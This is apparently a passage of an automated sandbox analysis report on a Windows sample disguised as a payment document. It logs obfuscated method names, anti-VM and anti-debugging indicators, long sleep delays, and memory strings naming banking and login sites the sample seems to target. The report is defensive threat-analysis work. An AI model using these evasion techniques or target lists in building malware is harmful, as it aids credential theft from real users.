                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, BvYnnC3dq2MFvh150l.csHigh entropy of concatenated method names: 'LytEN4UUj', 'h6heT3E0V', 'qPmy2QyxS', 'XE0i3ZYmm', 'QVxDendjw', 'VLZl4V9DB', 'koDF70UYWiHWW83W9t', 'uGNlxtFcwxxIWZqJXj', 'g61SQ0bTe', 'zokXY6o7Q'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, pp6G2MFxDKv6awNaAk.csHigh entropy of concatenated method names: 'x8T0VWChMs', 'Qvv0hn4Q39', 'i38005TxC9', 'Kiu0ZoqpFN', 'wUL0p0BesR', 'LVi0Q2tlPq', 'Dispose', 'VnoSjBCK5X', 'MOYSLgXVcr', 'XxfSHLJkNi'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, M6Ss5AdqI6xKbLxa2x.csHigh entropy of concatenated method names: 'fvSXH69TfW', 'puvXG6uOfd', 'KZXXf9xxpU', 'N5XXoWX309', 'FS4X0LBGPd', 'WY1XnBYcDt', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, loZW9m4sDEXrM3LKXc.csHigh entropy of concatenated method names: 'cvT01v3sxk', 'GOA0CfFCTR', 'OjL0gAINqh', 'KZl0KHI9lk', 'Lxg0RDudLU', 'FLa0PZcrBG', 'd4u0887LjY', 'u5Y0x3AyE7', 'RDV0W9da3R', 'Fs00rGc5pE'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, aVWu2kJJV36e23MxBVE.csHigh entropy of concatenated method names: 'rsJXd3ZLB6', 'FZFXz6rGgW', 'T4mZN4Vtib', 'hRPZJfc73h', 'dGnZ38SFta', 'ds1ZwN9SM4', 'TM8ZMPg90I', 'j94Z9Jell2', 'IO7ZjEjt7N', 'wk4ZLZopw3'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, E6NKGT1PTud6hIE9NY.csHigh entropy of concatenated method names: 'P5Df9AU2xN', 'zPYfLooyTp', 'NJhfGpKu0S', 'w2kfoxd2Bd', 'I0QfnC865T', 'NwEGc9lB8y', 'PEBGb18wNq', 'ilrGFophly', 'FOpGswM9Gw', 'hInG4hoWZK'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, Goalmj8Bru8UbGGuvJ.csHigh entropy of concatenated method names: 'Qrkoj1CyFY', 'UFwoHTEIYv', 'PZaofVecvq', 'QDefdrXCIc', 'AecfzMwjBI', 'BhfoNcH6aV', 'qoRoJjHAk9', 'yeko3BTw5Q', 'zL9owHl4xT', 'BPZoMsKL8X'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.csHigh entropy of concatenated method names: 'C4Vw9xrq1x', 'IjCwj4PWcA', 'IeYwLsoTp3', 'dEOwH6N6ut', 'MlMwGj1GSn', 'rZvwfHKUs7', 'xXpwoTjKDu', 'yeUwn6W0mo', 's4mwTccue3', 'I4Mw2jY9kO'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, KqSZ65u4YNlGTuZpXE.csHigh entropy of concatenated method names: 'oIVVF1LyAS', 'Os4VsL3eSP', 'EmOV4dOJOp', 'cfCVdR0PBG', 'GyDuKfZGIbI3vKnGfwr', 'g7UlLird3ckw5WjcK2t', 'TZ1hSYrztLg3KGHuOJy', 'vPSIysZBnLmjWpZAXQn'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, Po5X6rJMaqECJJE2YZW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Cw3I0AI9uu', 'x1YIXMh28V', 'z4nIZFtvDa', 'wAmIIrHE9g', 'uPuIpsT2Zi', 'PCtItnJIU4', 'Ix6IQyI8LQ'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, gSW0m3JNlEFcUN1DL5o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kMKXargggR', 'Ka6XktddXd', 'I7KXUeL63X', 'sylXAXJUmM', 'm5NXud2FPh', 'cKrXvCkoZU', 'gDcXqH5o9H'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, nu9h5JqGSZptvqwEWO.csHigh entropy of concatenated method names: 'x81h2qNOb2', 'HurhBO6H3v', 'ToString', 'IX4hjWmQR2', 'B3HhL9ou3A', 'nRVhH4Mj9W', 'x7XhGDT3yk', 'Qbxhfk56O4', 'FVPhoeMLNp', 'gQ4hnURE1h'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, BO7eTHMwJqAxXSAxc7.csHigh entropy of concatenated method names: 'NSNJo1Pjpm', 'zEKJnL740q', 'TnYJ2Eau6C', 'vtkJBZTDwy', 'hhkJVdpm6N', 'IGTJ6PTud6', 'Y24qhlxyWTQQ9jFIIZ', 'kwiknE9vIax5r9Oy0G', 'UEAJJSO5jU', 'O3FJwRMNsM'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, H8dv04LKuelEGyv7Vi.csHigh entropy of concatenated method names: 'Dispose', 'Iv6J4awNaA', 'vbG3CnvAFo', 'JxkPyRXobv', 'PTXJdQJimZ', 't3CJzCy2yB', 'ProcessDialogKey', 'R2T3NoZW9m', 'WDE3JXrM3L', 'IXc33x6Ss5'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, E4ksvqDnYEau6CptkZ.csHigh entropy of concatenated method names: 'YI8HeWrK8h', 'HwPHy8slhM', 'EcQHm9CteF', 'vtFHDqaWmV', 'X63HV0Yxbo', 'NmYH6KuOlx', 'mieHhBT0cr', 'KPWHSJuWIW', 'CWiH0G8W1q', 'YeFHX9Yrks'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, lDwyF6lHJsf1bGhkdp.csHigh entropy of concatenated method names: 'WynGYby0qQ', 'ef7GieByjp', 'OxiHgFdZQE', 'nfMHKJ3gh0', 'Po9HRM6MBf', 'vCqHPfa8md', 'ubGH8C9MQ4', 'FbAHxk3SjX', 'AI4HWWX6Zf', 'hS0HrSproE'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, u4ol8KzGkXpGUyqCGE.csHigh entropy of concatenated method names: 'OxIXyYNYdq', 'Ka3XmCAlUR', 'I6SXDseYkg', 'YOQX1cyJ8E', 'B0tXCCSuFn', 'ggxXKASMD3', 'TSeXRL4h89', 'XJnXQUcqvd', 'OC4XOjaMVo', 'rhsX5wQqsN'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, OoBZYlURZFhiWNTeye.csHigh entropy of concatenated method names: 'x6e7mhLKmw', 'PM97DigSad', 'Nxr71M3haK', 'Evx7C1DD22', 'wFq7KpOxnR', 'dNe7ReN3Xv', 'NVv7866jXg', 'iSm7xh4tKW', 'nuw7rw6Hno', 'FGX7anFP5e'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, DWwqrCAdAoD5b25WSq.csHigh entropy of concatenated method names: 'zxuVrOPF8N', 'bSlVkaI6ir', 'svVVAFi6JG', 'hZ2Vu6sTRl', 'XmNVC7kf0i', 'Xm2VgEuWv1', 'uESVK1OYMo', 'hK9VRmjSFb', 'miPVPKgkW6', 'WXTV8Adc3w'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, BbEFNFWk7srD2eL76Q.csHigh entropy of concatenated method names: 'MQroO47rNX', 'jRDo5grL7t', 'QCtoEPBXAy', 'JOvoeWO6nw', 'HTNoYTyrJk', 'o79oyP7Rgr', 'lNCoiQa3kf', 'QaKomAXg5u', 'TjDoDQuRCp', 'AUyolHCRAN'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, WFgxcqC0OBC8Z8lXTy.csHigh entropy of concatenated method names: 'mtjJxkV2JsVI3LsSrdH', 'NPyLFgV6EpLTaQYwdVQ', 'k6BfSn66TZ', 'm1tf0LutA1', 'cFUfXWECCS', 'M0Ey0gV09Qyv7pSuT05', 'oj4KFdVvcuGmNeKBsYR', 'kiyATjVRdDGH1raHUbE'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, a1PjpmmEEKL740qFJE.csHigh entropy of concatenated method names: 'Ib1LAasruw', 'PmrLudgx79', 'wWSLv2NeCh', 'KAbLq6wX26', 'HteLcSon3V', 'yRhLb91n6Q', 'Y7QLF8gx76', 'LmFLsXidh2', 'fe1L4Lpsfa', 'MYpLdAIrWO'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, xMlKa8byoI2WwgvKIZ.csHigh entropy of concatenated method names: 'apnhs6bDP3', 'XaChd9gdNt', 'QkqSN5IJAe', 'KaiSJxAL9p', 'MaLhaAS6VJ', 'yTnhkIsIKR', 'LPUhUg4PR7', 'bUnhAtk60c', 'h54huntJ5S', 'IbJhvKcYii'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, BvYnnC3dq2MFvh150l.csHigh entropy of concatenated method names: 'LytEN4UUj', 'h6heT3E0V', 'qPmy2QyxS', 'XE0i3ZYmm', 'QVxDendjw', 'VLZl4V9DB', 'koDF70UYWiHWW83W9t', 'uGNlxtFcwxxIWZqJXj', 'g61SQ0bTe', 'zokXY6o7Q'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, pp6G2MFxDKv6awNaAk.csHigh entropy of concatenated method names: 'x8T0VWChMs', 'Qvv0hn4Q39', 'i38005TxC9', 'Kiu0ZoqpFN', 'wUL0p0BesR', 'LVi0Q2tlPq', 'Dispose', 'VnoSjBCK5X', 'MOYSLgXVcr', 'XxfSHLJkNi'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, M6Ss5AdqI6xKbLxa2x.csHigh entropy of concatenated method names: 'fvSXH69TfW', 'puvXG6uOfd', 'KZXXf9xxpU', 'N5XXoWX309', 'FS4X0LBGPd', 'WY1XnBYcDt', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, loZW9m4sDEXrM3LKXc.csHigh entropy of concatenated method names: 'cvT01v3sxk', 'GOA0CfFCTR', 'OjL0gAINqh', 'KZl0KHI9lk', 'Lxg0RDudLU', 'FLa0PZcrBG', 'd4u0887LjY', 'u5Y0x3AyE7', 'RDV0W9da3R', 'Fs00rGc5pE'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, aVWu2kJJV36e23MxBVE.csHigh entropy of concatenated method names: 'rsJXd3ZLB6', 'FZFXz6rGgW', 'T4mZN4Vtib', 'hRPZJfc73h', 'dGnZ38SFta', 'ds1ZwN9SM4', 'TM8ZMPg90I', 'j94Z9Jell2', 'IO7ZjEjt7N', 'wk4ZLZopw3'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, E6NKGT1PTud6hIE9NY.csHigh entropy of concatenated method names: 'P5Df9AU2xN', 'zPYfLooyTp', 'NJhfGpKu0S', 'w2kfoxd2Bd', 'I0QfnC865T', 'NwEGc9lB8y', 'PEBGb18wNq', 'ilrGFophly', 'FOpGswM9Gw', 'hInG4hoWZK'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, Goalmj8Bru8UbGGuvJ.csHigh entropy of concatenated method names: 'Qrkoj1CyFY', 'UFwoHTEIYv', 'PZaofVecvq', 'QDefdrXCIc', 'AecfzMwjBI', 'BhfoNcH6aV', 'qoRoJjHAk9', 'yeko3BTw5Q', 'zL9owHl4xT', 'BPZoMsKL8X'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.csHigh entropy of concatenated method names: 'C4Vw9xrq1x', 'IjCwj4PWcA', 'IeYwLsoTp3', 'dEOwH6N6ut', 'MlMwGj1GSn', 'rZvwfHKUs7', 'xXpwoTjKDu', 'yeUwn6W0mo', 's4mwTccue3', 'I4Mw2jY9kO'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, KqSZ65u4YNlGTuZpXE.csHigh entropy of concatenated method names: 'oIVVF1LyAS', 'Os4VsL3eSP', 'EmOV4dOJOp', 'cfCVdR0PBG', 'GyDuKfZGIbI3vKnGfwr', 'g7UlLird3ckw5WjcK2t', 'TZ1hSYrztLg3KGHuOJy', 'vPSIysZBnLmjWpZAXQn'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, Po5X6rJMaqECJJE2YZW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Cw3I0AI9uu', 'x1YIXMh28V', 'z4nIZFtvDa', 'wAmIIrHE9g', 'uPuIpsT2Zi', 'PCtItnJIU4', 'Ix6IQyI8LQ'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, gSW0m3JNlEFcUN1DL5o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kMKXargggR', 'Ka6XktddXd', 'I7KXUeL63X', 'sylXAXJUmM', 'm5NXud2FPh', 'cKrXvCkoZU', 'gDcXqH5o9H'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, nu9h5JqGSZptvqwEWO.csHigh entropy of concatenated method names: 'x81h2qNOb2', 'HurhBO6H3v', 'ToString', 'IX4hjWmQR2', 'B3HhL9ou3A', 'nRVhH4Mj9W', 'x7XhGDT3yk', 'Qbxhfk56O4', 'FVPhoeMLNp', 'gQ4hnURE1h'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, BO7eTHMwJqAxXSAxc7.csHigh entropy of concatenated method names: 'NSNJo1Pjpm', 'zEKJnL740q', 'TnYJ2Eau6C', 'vtkJBZTDwy', 'hhkJVdpm6N', 'IGTJ6PTud6', 'Y24qhlxyWTQQ9jFIIZ', 'kwiknE9vIax5r9Oy0G', 'UEAJJSO5jU', 'O3FJwRMNsM'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, H8dv04LKuelEGyv7Vi.csHigh entropy of concatenated method names: 'Dispose', 'Iv6J4awNaA', 'vbG3CnvAFo', 'JxkPyRXobv', 'PTXJdQJimZ', 't3CJzCy2yB', 'ProcessDialogKey', 'R2T3NoZW9m', 'WDE3JXrM3L', 'IXc33x6Ss5'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, E4ksvqDnYEau6CptkZ.csHigh entropy of concatenated method names: 'YI8HeWrK8h', 'HwPHy8slhM', 'EcQHm9CteF', 'vtFHDqaWmV', 'X63HV0Yxbo', 'NmYH6KuOlx', 'mieHhBT0cr', 'KPWHSJuWIW', 'CWiH0G8W1q', 'YeFHX9Yrks'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, lDwyF6lHJsf1bGhkdp.csHigh entropy of concatenated method names: 'WynGYby0qQ', 'ef7GieByjp', 'OxiHgFdZQE', 'nfMHKJ3gh0', 'Po9HRM6MBf', 'vCqHPfa8md', 'ubGH8C9MQ4', 'FbAHxk3SjX', 'AI4HWWX6Zf', 'hS0HrSproE'
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, u4ol8KzGkXpGUyqCGE.csHigh entropy of concatenated method names: 'OxIXyYNYdq', 'Ka3XmCAlUR', 'I6SXDseYkg', 'YOQX1cyJ8E', 'B0tXCCSuFn', 'ggxXKASMD3', 'TSeXRL4h89', 'XJnXQUcqvd', 'OC4XOjaMVo', 'rhsX5wQqsN'
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SOA - Final Payment.exe PID: 7296, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 34C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 1A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: 91A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: A1A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: A390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: B390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: BED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: CED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: DED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED1C0 rdtsc 5_2_012ED1C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 2454Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 7518Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\secinit.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe TID: 7300Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe TID: 7316Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep count: 2454 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep time: -4908000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep count: 7518 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8012Thread sleep time: -15036000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6C750 FindFirstFileW,FindNextFileW,FindClose,10_2_02A6C750
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 472E1186.10.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 472E1186.10.drBinary or memory string: global block list test formVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 472E1186.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 472E1186.10.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 472E1186.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 472E1186.10.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 472E1186.10.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: firefox.exe, 0000000E.00000002.2047067119.000002B8859AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 472E1186.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 472E1186.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 472E1186.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2604309160.0000000000A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 472E1186.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 472E1186.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 472E1186.10.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 472E1186.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 472E1186.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 472E1186.10.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 472E1186.10.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: 472E1186.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 472E1186.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 472E1186.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED1C0 rdtsc 5_2_012ED1C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00417CF3 LdrLoadDll,5_2_00417CF3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A0124 mov eax, dword ptr fs:[00000030h]5_2_012A0124
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B136 mov eax, dword ptr fs:[00000030h]5_2_0126B136
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B136 mov eax, dword ptr fs:[00000030h]5_2_0126B136
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B136 mov eax, dword ptr fs:[00000030h]5_2_0126B136
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B136 mov eax, dword ptr fs:[00000030h]5_2_0126B136
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271131 mov eax, dword ptr fs:[00000030h]5_2_01271131
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271131 mov eax, dword ptr fs:[00000030h]5_2_01271131
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01330115 mov eax, dword ptr fs:[00000030h]5_2_01330115
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A118 mov ecx, dword ptr fs:[00000030h]5_2_0131A118
